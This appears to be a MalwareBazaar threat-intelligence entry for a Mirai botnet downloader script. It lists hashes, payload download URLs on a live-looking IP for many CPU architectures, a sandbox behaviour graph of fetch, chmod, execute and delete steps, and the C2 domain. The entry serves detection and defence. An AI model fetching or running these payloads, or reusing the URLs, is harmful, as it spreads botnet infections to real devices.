MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b7bfaf45eef40e028b2ad7086d113547c7d7514b3f5e93ff4d6d9554a46bc6dc. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 8


Intelligence 8 IOCs YARA 1 File information Comments

SHA256 hash: b7bfaf45eef40e028b2ad7086d113547c7d7514b3f5e93ff4d6d9554a46bc6dc
SHA3-384 hash: a62a7e1d31d47a6fbb82b9b389afcac051932a133cf7e4019dc4ecd0be24e2a5b4208bd42976b8a482a6c5806bb676f4
SHA1 hash: 4b928efa4a46236199f4e05bf873453b8874117f
MD5 hash: 9ae1c3fecf8c6b1e8f90775af7a8f9c1
humanhash: white-kentucky-april-don
File name:1.sh
Download: download sample
Signature Mirai
File size:3'164 bytes
First seen:2025-11-19 22:01:50 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 48:ioldGVsD+vRoUUPFyR8nJhL4VLAJPNGM/2uN6:ioldGVsD+vRoUUPFyR04VLiPNGMD6
TLSH T1945184BA014407706CE26BD7637E804C3191929749F6BF26A7ED28E88D8DFDCBC41667
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://41.216.189.88/00101010101001/S3o.x865569bf3426d939b9fd9f33f275e86f1e78faf9a157cc6aa803aef1f3df7db933 Miraielf geofenced mirai opendir ua-wget USA x86
http://41.216.189.88/00101010101001/S3o.mipscf65e78b52b19e3ac5a1a3f10f571a60fd11b47a72e47e54bad00dcc10624166 Miraielf geofenced mips mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arc44b6c1d1e7526a23c24fa5f7cb939015f40c5cb722b4e879e89ed9a63b6db212 Miraiarc elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.i468n/an/aelf ua-wget
http://41.216.189.88/00101010101001/S3o.i6866b8dbe5cea96bfaa75c318614b27fd139f5aba3d7ef63181dc939fa0fd2ce10e Miraielf geofenced mirai opendir ua-wget USA x86
http://41.216.189.88/00101010101001/S3o.x86_64d3cf20462308c14ecdae9a05a63526cf586de84f919e6b6a380834d98afdc17e Miraielf geofenced mirai opendir ua-wget USA x86
http://41.216.189.88/00101010101001/S3o.mpslb2a9a313364beca9f0c8ca3bfa4309d39b836a0852cf7953ce379353983f28ba Miraielf geofenced mips mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.armab2941f4781a5fdff78181e878fe8b065e5decd73a1949a99b12b724934cde58 Miraiarm elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arm555270354a25e6f143ab99369d1e5129dd6a9f629924aea60f59e520b79cdb4ce Miraiarm elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arm66aea4b3f8dd415b9716ee71775fd0706098e6a3d8dea933f0ed77343082a3125 Miraiarm elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arm7b5ad80ac7cba318becb4dec3b9b8ed907de90a28788a8b32cc925eed7ca5f17b Miraiarm elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.ppc0e7ff0d9b6a39fc2196676905c970f18c7c48b88f39c7568d230b07c28b70f44 Miraielf geofenced mirai opendir PowerPC ua-wget USA
http://41.216.189.88/00101010101001/S3o.spc662cb3f68599553021643f28a830300a3abb6b8b977225b834e93282b5f38a78 Miraielf geofenced mirai opendir sparc ua-wget USA
http://41.216.189.88/00101010101001/S3o.m68ke9a1cb2b8cf0c4a1eb4948e6a336fc2a56257c4a65fa00a28ed50c98b02cfa74 Miraielf geofenced m68k mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.sh42580a0151f1ddf68044938a1c2e65fe3d39f916d902598fd88970ea48988a393 Miraielf geofenced mirai opendir SuperH ua-wget USA

Intelligence


File Origin
# of uploads :
1
# of downloads :
50
Origin country :
DE DE
Vendor Threat Intelligence
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox evasive
Verdict:
Malicious
File Type:
unix shell
First seen:
2025-11-19T19:29:00Z UTC
Last seen:
2025-11-21T06:56:00Z UTC
Hits:
~10
Status:
terminated
Behavior Graph:
%3 guuid=ed588dbf-1b00-0000-4051-72e1b20c0000 pid=3250 /usr/bin/sudo guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254 /tmp/sample.bin guuid=ed588dbf-1b00-0000-4051-72e1b20c0000 pid=3250->guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254 execve guuid=971decc2-1b00-0000-4051-72e1b80c0000 pid=3256 /usr/bin/cp guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=971decc2-1b00-0000-4051-72e1b80c0000 pid=3256 execve guuid=246650c8-1b00-0000-4051-72e1c80c0000 pid=3272 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=246650c8-1b00-0000-4051-72e1c80c0000 pid=3272 execve guuid=3eea71d3-1b00-0000-4051-72e1e20c0000 pid=3298 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=3eea71d3-1b00-0000-4051-72e1e20c0000 pid=3298 execve guuid=e64486df-1b00-0000-4051-72e1f70c0000 pid=3319 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=e64486df-1b00-0000-4051-72e1f70c0000 pid=3319 execve guuid=489be6df-1b00-0000-4051-72e1f90c0000 pid=3321 /tmp/S3o.x86 net guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=489be6df-1b00-0000-4051-72e1f90c0000 pid=3321 execve guuid=358df80d-1d00-0000-4051-72e14d0f0000 pid=3917 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=358df80d-1d00-0000-4051-72e14d0f0000 pid=3917 execve guuid=2ce46e0e-1d00-0000-4051-72e14e0f0000 pid=3918 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=2ce46e0e-1d00-0000-4051-72e14e0f0000 pid=3918 execve guuid=2eece116-1d00-0000-4051-72e1640f0000 pid=3940 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=2eece116-1d00-0000-4051-72e1640f0000 pid=3940 execve guuid=ea1a2123-1d00-0000-4051-72e1860f0000 pid=3974 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=ea1a2123-1d00-0000-4051-72e1860f0000 pid=3974 execve guuid=fa628723-1d00-0000-4051-72e1880f0000 pid=3976 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=fa628723-1d00-0000-4051-72e1880f0000 pid=3976 clone guuid=f2179625-1d00-0000-4051-72e18c0f0000 pid=3980 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f2179625-1d00-0000-4051-72e18c0f0000 pid=3980 execve guuid=f4baf129-1d00-0000-4051-72e1990f0000 pid=3993 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f4baf129-1d00-0000-4051-72e1990f0000 pid=3993 execve guuid=8bb4f033-1d00-0000-4051-72e1bb0f0000 pid=4027 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=8bb4f033-1d00-0000-4051-72e1bb0f0000 pid=4027 execve guuid=71442a41-1d00-0000-4051-72e1e40f0000 pid=4068 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=71442a41-1d00-0000-4051-72e1e40f0000 pid=4068 execve guuid=f8338141-1d00-0000-4051-72e1e50f0000 pid=4069 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f8338141-1d00-0000-4051-72e1e50f0000 pid=4069 clone guuid=2ef86d42-1d00-0000-4051-72e1eb0f0000 pid=4075 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=2ef86d42-1d00-0000-4051-72e1eb0f0000 pid=4075 execve guuid=cb9bb243-1d00-0000-4051-72e1f10f0000 pid=4081 /usr/bin/wget net send-data guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=cb9bb243-1d00-0000-4051-72e1f10f0000 pid=4081 execve guuid=d7830348-1d00-0000-4051-72e102100000 pid=4098 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=d7830348-1d00-0000-4051-72e102100000 pid=4098 execve guuid=b9062650-1d00-0000-4051-72e114100000 pid=4116 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=b9062650-1d00-0000-4051-72e114100000 pid=4116 execve guuid=11618a50-1d00-0000-4051-72e115100000 pid=4117 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=11618a50-1d00-0000-4051-72e115100000 pid=4117 clone guuid=2478bc50-1d00-0000-4051-72e116100000 pid=4118 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=2478bc50-1d00-0000-4051-72e116100000 pid=4118 execve guuid=5aa14751-1d00-0000-4051-72e11a100000 pid=4122 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=5aa14751-1d00-0000-4051-72e11a100000 pid=4122 execve guuid=53e76a59-1d00-0000-4051-72e139100000 pid=4153 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=53e76a59-1d00-0000-4051-72e139100000 pid=4153 execve guuid=8fa32e61-1d00-0000-4051-72e151100000 pid=4177 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=8fa32e61-1d00-0000-4051-72e151100000 pid=4177 execve guuid=f7cd7961-1d00-0000-4051-72e153100000 pid=4179 /tmp/S3o.i686 net guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f7cd7961-1d00-0000-4051-72e153100000 pid=4179 execve guuid=56299fd9-1d00-0000-4051-72e1ba110000 pid=4538 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=56299fd9-1d00-0000-4051-72e1ba110000 pid=4538 execve guuid=d79412da-1d00-0000-4051-72e1bc110000 pid=4540 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=d79412da-1d00-0000-4051-72e1bc110000 pid=4540 execve guuid=03a839e3-1d00-0000-4051-72e1e0110000 pid=4576 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=03a839e3-1d00-0000-4051-72e1e0110000 pid=4576 execve guuid=dd1938ee-1d00-0000-4051-72e110120000 pid=4624 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=dd1938ee-1d00-0000-4051-72e110120000 pid=4624 execve guuid=699894ee-1d00-0000-4051-72e112120000 pid=4626 /tmp/S3o.x86_64 mprotect-exec net guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=699894ee-1d00-0000-4051-72e112120000 pid=4626 execve guuid=82e27566-1e00-0000-4051-72e166130000 pid=4966 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=82e27566-1e00-0000-4051-72e166130000 pid=4966 execve guuid=cb95f466-1e00-0000-4051-72e169130000 pid=4969 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=cb95f466-1e00-0000-4051-72e169130000 pid=4969 execve guuid=a79b4e6f-1e00-0000-4051-72e183130000 pid=4995 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=a79b4e6f-1e00-0000-4051-72e183130000 pid=4995 execve guuid=f1b14d82-1e00-0000-4051-72e193130000 pid=5011 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f1b14d82-1e00-0000-4051-72e193130000 pid=5011 execve guuid=7f42ab82-1e00-0000-4051-72e195130000 pid=5013 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=7f42ab82-1e00-0000-4051-72e195130000 pid=5013 clone guuid=f2328383-1e00-0000-4051-72e199130000 pid=5017 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f2328383-1e00-0000-4051-72e199130000 pid=5017 execve guuid=7097fa8d-1e00-0000-4051-72e1b9130000 pid=5049 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=7097fa8d-1e00-0000-4051-72e1b9130000 pid=5049 execve guuid=e0620296-1e00-0000-4051-72e1cb130000 pid=5067 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=e0620296-1e00-0000-4051-72e1cb130000 pid=5067 execve guuid=f1ca639f-1e00-0000-4051-72e1eb130000 pid=5099 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f1ca639f-1e00-0000-4051-72e1eb130000 pid=5099 execve guuid=bfd7a79f-1e00-0000-4051-72e1ec130000 pid=5100 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=bfd7a79f-1e00-0000-4051-72e1ec130000 pid=5100 clone guuid=489731a0-1e00-0000-4051-72e1f1130000 pid=5105 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=489731a0-1e00-0000-4051-72e1f1130000 pid=5105 execve guuid=78c164a1-1e00-0000-4051-72e1f6130000 pid=5110 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=78c164a1-1e00-0000-4051-72e1f6130000 pid=5110 execve guuid=b44734a6-1e00-0000-4051-72e10a140000 pid=5130 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=b44734a6-1e00-0000-4051-72e10a140000 pid=5130 execve guuid=bfd3c4ab-1e00-0000-4051-72e11d140000 pid=5149 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=bfd3c4ab-1e00-0000-4051-72e11d140000 pid=5149 execve guuid=8a7c35ac-1e00-0000-4051-72e120140000 pid=5152 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=8a7c35ac-1e00-0000-4051-72e120140000 pid=5152 clone guuid=cbbfc5ac-1e00-0000-4051-72e123140000 pid=5155 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=cbbfc5ac-1e00-0000-4051-72e123140000 pid=5155 execve guuid=36ea0dad-1e00-0000-4051-72e125140000 pid=5157 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=36ea0dad-1e00-0000-4051-72e125140000 pid=5157 execve guuid=1761a2b2-1e00-0000-4051-72e137140000 pid=5175 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=1761a2b2-1e00-0000-4051-72e137140000 pid=5175 execve guuid=1b2f8aba-1e00-0000-4051-72e14a140000 pid=5194 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=1b2f8aba-1e00-0000-4051-72e14a140000 pid=5194 execve guuid=aa5ed4ba-1e00-0000-4051-72e14b140000 pid=5195 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=aa5ed4ba-1e00-0000-4051-72e14b140000 pid=5195 clone guuid=419bc2bb-1e00-0000-4051-72e14d140000 pid=5197 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=419bc2bb-1e00-0000-4051-72e14d140000 pid=5197 execve guuid=fd23a5bd-1e00-0000-4051-72e14f140000 pid=5199 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=fd23a5bd-1e00-0000-4051-72e14f140000 pid=5199 execve guuid=6cf601c6-1e00-0000-4051-72e162140000 pid=5218 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=6cf601c6-1e00-0000-4051-72e162140000 pid=5218 execve guuid=13e246cf-1e00-0000-4051-72e19b140000 pid=5275 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=13e246cf-1e00-0000-4051-72e19b140000 pid=5275 execve guuid=161993cf-1e00-0000-4051-72e19c140000 pid=5276 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=161993cf-1e00-0000-4051-72e19c140000 pid=5276 clone guuid=a63f46d0-1e00-0000-4051-72e19e140000 pid=5278 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=a63f46d0-1e00-0000-4051-72e19e140000 pid=5278 execve guuid=18fd76d5-1e00-0000-4051-72e19f140000 pid=5279 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=18fd76d5-1e00-0000-4051-72e19f140000 pid=5279 execve guuid=40829ee4-1e00-0000-4051-72e1a3140000 pid=5283 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=40829ee4-1e00-0000-4051-72e1a3140000 pid=5283 execve guuid=448ddcea-1e00-0000-4051-72e1ac140000 pid=5292 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=448ddcea-1e00-0000-4051-72e1ac140000 pid=5292 execve guuid=3c2725eb-1e00-0000-4051-72e1ad140000 pid=5293 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=3c2725eb-1e00-0000-4051-72e1ad140000 pid=5293 clone guuid=1055b6eb-1e00-0000-4051-72e1af140000 pid=5295 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=1055b6eb-1e00-0000-4051-72e1af140000 pid=5295 execve guuid=3a5913ec-1e00-0000-4051-72e1b0140000 pid=5296 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=3a5913ec-1e00-0000-4051-72e1b0140000 pid=5296 execve guuid=72446af5-1e00-0000-4051-72e1b1140000 pid=5297 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=72446af5-1e00-0000-4051-72e1b1140000 pid=5297 execve guuid=89432500-1f00-0000-4051-72e1b2140000 pid=5298 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=89432500-1f00-0000-4051-72e1b2140000 pid=5298 execve guuid=6db87000-1f00-0000-4051-72e1b3140000 pid=5299 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=6db87000-1f00-0000-4051-72e1b3140000 pid=5299 clone guuid=f11f0801-1f00-0000-4051-72e1b5140000 pid=5301 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f11f0801-1f00-0000-4051-72e1b5140000 pid=5301 execve guuid=21c45801-1f00-0000-4051-72e1b6140000 pid=5302 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=21c45801-1f00-0000-4051-72e1b6140000 pid=5302 execve guuid=bba6630b-1f00-0000-4051-72e1b7140000 pid=5303 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=bba6630b-1f00-0000-4051-72e1b7140000 pid=5303 execve guuid=b98c5613-1f00-0000-4051-72e1b8140000 pid=5304 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=b98c5613-1f00-0000-4051-72e1b8140000 pid=5304 execve guuid=9c65a713-1f00-0000-4051-72e1b9140000 pid=5305 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=9c65a713-1f00-0000-4051-72e1b9140000 pid=5305 clone guuid=f585aa14-1f00-0000-4051-72e1bb140000 pid=5307 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=f585aa14-1f00-0000-4051-72e1bb140000 pid=5307 execve guuid=6edd0615-1f00-0000-4051-72e1bc140000 pid=5308 /usr/bin/wget net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=6edd0615-1f00-0000-4051-72e1bc140000 pid=5308 execve guuid=705d401e-1f00-0000-4051-72e1bd140000 pid=5309 /usr/bin/curl net send-data write-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=705d401e-1f00-0000-4051-72e1bd140000 pid=5309 execve guuid=ed5d8e2b-1f00-0000-4051-72e1be140000 pid=5310 /usr/bin/chmod guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=ed5d8e2b-1f00-0000-4051-72e1be140000 pid=5310 execve guuid=b5b6f02b-1f00-0000-4051-72e1bf140000 pid=5311 /usr/bin/bash guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=b5b6f02b-1f00-0000-4051-72e1bf140000 pid=5311 clone guuid=1c46c62c-1f00-0000-4051-72e1c1140000 pid=5313 /usr/bin/rm delete-file guuid=a0d251c2-1b00-0000-4051-72e1b60c0000 pid=3254->guuid=1c46c62c-1f00-0000-4051-72e1c1140000 pid=5313 execve 510217a1-1b11-5fd9-818c-c738850952cb 41.216.189.88:80 guuid=246650c8-1b00-0000-4051-72e1c80c0000 pid=3272->510217a1-1b11-5fd9-818c-c738850952cb send: 150B guuid=3eea71d3-1b00-0000-4051-72e1e20c0000 pid=3298->510217a1-1b11-5fd9-818c-c738850952cb send: 99B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=489be6df-1b00-0000-4051-72e1f90c0000 pid=3321->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=c812c7e0-1b00-0000-4051-72e1fb0c0000 pid=3323 /tmp/S3o.x86 guuid=489be6df-1b00-0000-4051-72e1f90c0000 pid=3321->guuid=c812c7e0-1b00-0000-4051-72e1fb0c0000 pid=3323 clone guuid=18afde0d-1d00-0000-4051-72e14b0f0000 pid=3915 /tmp/S3o.x86 guuid=489be6df-1b00-0000-4051-72e1f90c0000 pid=3321->guuid=18afde0d-1d00-0000-4051-72e14b0f0000 pid=3915 clone guuid=fd5ce50d-1d00-0000-4051-72e14c0f0000 pid=3916 /tmp/S3o.x86 net send-data zombie guuid=489be6df-1b00-0000-4051-72e1f90c0000 pid=3321->guuid=fd5ce50d-1d00-0000-4051-72e14c0f0000 pid=3916 clone guuid=af79d0e0-1b00-0000-4051-72e1fd0c0000 pid=3325 /tmp/S3o.x86 guuid=c812c7e0-1b00-0000-4051-72e1fb0c0000 pid=3323->guuid=af79d0e0-1b00-0000-4051-72e1fd0c0000 pid=3325 clone guuid=8122d9e0-1b00-0000-4051-72e1fe0c0000 pid=3326 /tmp/S3o.x86 dns net send-data zombie guuid=c812c7e0-1b00-0000-4051-72e1fb0c0000 pid=3323->guuid=8122d9e0-1b00-0000-4051-72e1fe0c0000 pid=3326 clone guuid=8122d9e0-1b00-0000-4051-72e1fe0c0000 pid=3326->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 38B 27df0594-2c83-55f0-869f-ffb273ade180 vcute69.bounceme.net:12121 guuid=8122d9e0-1b00-0000-4051-72e1fe0c0000 pid=3326->27df0594-2c83-55f0-869f-ffb273ade180 send: 13B guuid=fd5ce50d-1d00-0000-4051-72e14c0f0000 pid=3916->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 195B 17d12814-2053-5003-8343-6c5dc360bc15 vcute69.bounceme.net:80 guuid=fd5ce50d-1d00-0000-4051-72e14c0f0000 pid=3916->17d12814-2053-5003-8343-6c5dc360bc15 send: 13B guuid=2ce46e0e-1d00-0000-4051-72e14e0f0000 pid=3918->17d12814-2053-5003-8343-6c5dc360bc15 send: 151B guuid=2eece116-1d00-0000-4051-72e1640f0000 pid=3940->17d12814-2053-5003-8343-6c5dc360bc15 send: 100B guuid=f4baf129-1d00-0000-4051-72e1990f0000 pid=3993->17d12814-2053-5003-8343-6c5dc360bc15 send: 150B guuid=8bb4f033-1d00-0000-4051-72e1bb0f0000 pid=4027->17d12814-2053-5003-8343-6c5dc360bc15 send: 99B guuid=cb9bb243-1d00-0000-4051-72e1f10f0000 pid=4081->17d12814-2053-5003-8343-6c5dc360bc15 send: 151B guuid=d7830348-1d00-0000-4051-72e102100000 pid=4098->17d12814-2053-5003-8343-6c5dc360bc15 send: 100B guuid=5aa14751-1d00-0000-4051-72e11a100000 pid=4122->17d12814-2053-5003-8343-6c5dc360bc15 send: 151B guuid=53e76a59-1d00-0000-4051-72e139100000 pid=4153->17d12814-2053-5003-8343-6c5dc360bc15 send: 100B guuid=f7cd7961-1d00-0000-4051-72e153100000 pid=4179->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con f77ebf5e-2af7-5b09-86f4-388588a8b445 0.0.0.0:12121 guuid=f7cd7961-1d00-0000-4051-72e153100000 pid=4179->f77ebf5e-2af7-5b09-86f4-388588a8b445 con guuid=d79412da-1d00-0000-4051-72e1bc110000 pid=4540->17d12814-2053-5003-8343-6c5dc360bc15 send: 153B guuid=03a839e3-1d00-0000-4051-72e1e0110000 pid=4576->17d12814-2053-5003-8343-6c5dc360bc15 send: 102B guuid=699894ee-1d00-0000-4051-72e112120000 pid=4626->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=699894ee-1d00-0000-4051-72e112120000 pid=4626->f77ebf5e-2af7-5b09-86f4-388588a8b445 con guuid=cb95f466-1e00-0000-4051-72e169130000 pid=4969->17d12814-2053-5003-8343-6c5dc360bc15 send: 151B guuid=a79b4e6f-1e00-0000-4051-72e183130000 pid=4995->17d12814-2053-5003-8343-6c5dc360bc15 send: 100B guuid=7097fa8d-1e00-0000-4051-72e1b9130000 pid=5049->17d12814-2053-5003-8343-6c5dc360bc15 send: 150B guuid=e0620296-1e00-0000-4051-72e1cb130000 pid=5067->17d12814-2053-5003-8343-6c5dc360bc15 send: 99B guuid=78c164a1-1e00-0000-4051-72e1f6130000 pid=5110->17d12814-2053-5003-8343-6c5dc360bc15 send: 151B guuid=b44734a6-1e00-0000-4051-72e10a140000 pid=5130->17d12814-2053-5003-8343-6c5dc360bc15 send: 100B guuid=36ea0dad-1e00-0000-4051-72e125140000 pid=5157->17d12814-2053-5003-8343-6c5dc360bc15 send: 151B guuid=1761a2b2-1e00-0000-4051-72e137140000 pid=5175->17d12814-2053-5003-8343-6c5dc360bc15 send: 100B guuid=fd23a5bd-1e00-0000-4051-72e14f140000 pid=5199->17d12814-2053-5003-8343-6c5dc360bc15 send: 151B guuid=6cf601c6-1e00-0000-4051-72e162140000 pid=5218->17d12814-2053-5003-8343-6c5dc360bc15 send: 100B guuid=18fd76d5-1e00-0000-4051-72e19f140000 pid=5279->17d12814-2053-5003-8343-6c5dc360bc15 send: 150B guuid=40829ee4-1e00-0000-4051-72e1a3140000 pid=5283->17d12814-2053-5003-8343-6c5dc360bc15 send: 99B guuid=3a5913ec-1e00-0000-4051-72e1b0140000 pid=5296->17d12814-2053-5003-8343-6c5dc360bc15 send: 150B guuid=72446af5-1e00-0000-4051-72e1b1140000 pid=5297->17d12814-2053-5003-8343-6c5dc360bc15 send: 99B guuid=21c45801-1f00-0000-4051-72e1b6140000 pid=5302->17d12814-2053-5003-8343-6c5dc360bc15 send: 151B guuid=bba6630b-1f00-0000-4051-72e1b7140000 pid=5303->17d12814-2053-5003-8343-6c5dc360bc15 send: 100B guuid=6edd0615-1f00-0000-4051-72e1bc140000 pid=5308->17d12814-2053-5003-8343-6c5dc360bc15 send: 150B guuid=705d401e-1f00-0000-4051-72e1bd140000 pid=5309->17d12814-2053-5003-8343-6c5dc360bc15 send: 99B
Threat name:
Linux.Downloader.Medusa
Status:
Malicious
First seen:
2025-11-19 22:02:34 UTC
File Type:
Text (Shell)
AV detection:
20 of 36 (55.56%)
Threat level:
  3/5
Result
Malware family:
Score:
  10/10
Tags:
family:mirai antivm botnet defense_evasion discovery linux upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Malware Config
C2 Extraction:
vcute69.bounceme.net
